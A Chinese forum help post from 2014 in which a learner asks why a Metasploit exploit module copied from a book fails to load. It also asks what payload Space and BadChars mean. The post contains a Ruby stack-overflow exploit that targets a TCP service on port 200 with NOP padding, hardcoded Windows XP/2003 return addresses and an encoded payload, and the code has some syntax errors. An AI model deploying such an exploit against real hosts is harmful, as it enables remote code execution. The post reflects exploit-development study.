-
-
[求助]问一下这个ruby代码哪儿有问题
-
发表于: 2014-9-9 10:38 1395
-
照着exploit的书上面写的,甚至把信息的部分都删了,结果metasploit还是找不出这个脚本。不知道哪里弄错了,在kali下连接win7的服务器程序。
我保存的是rb1.rb。
还有就是payload的space和badcode是什么意思。
ip也没有指定, Msf::Exploit::Remote类和Msf::Exploit::Remote::Tcp模块的定义怎么找呢。
byakugan.dll在哪下载呢?
class metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Payload' =>{ 'Space' => 1400, 'BadChars'=> "\x00\xff", }, 'Platform' => 'win', 'Targets' => [ ['Windows xp sp3en', {'Ret' => 0x7c87441c ,'Offset'=>504} ], ['Windows 2003 Server R2 SP2', {'Ret'=> 0x71c02b67 ,'Offset' =>504} ], ], 'DefaultTarget' => 0, 'Privileged '=> false ) ) register_option([Opt::RPORT(200)],self.class) end def exploit connect junk = make_nops(target['Offset']) sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded sock.put(sploit) handler disconnect end end
我保存的是rb1.rb。
还有就是payload的space和badcode是什么意思。
ip也没有指定, Msf::Exploit::Remote类和Msf::Exploit::Remote::Tcp模块的定义怎么找呢。
byakugan.dll在哪下载呢?
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
- [求助]问一下这个ruby代码哪儿有问题 1396
- [求助]pop pop ret类型的SEH溢出现在还能用吗。 4728
- [求助]请问下 这个tmd的脚本是否有问题 4004
- [讨论]内存隐藏学习总结 18871
- [求助]oreans unvirtualizer的使用问题 13264
看原图
赞赏
雪币:
留言: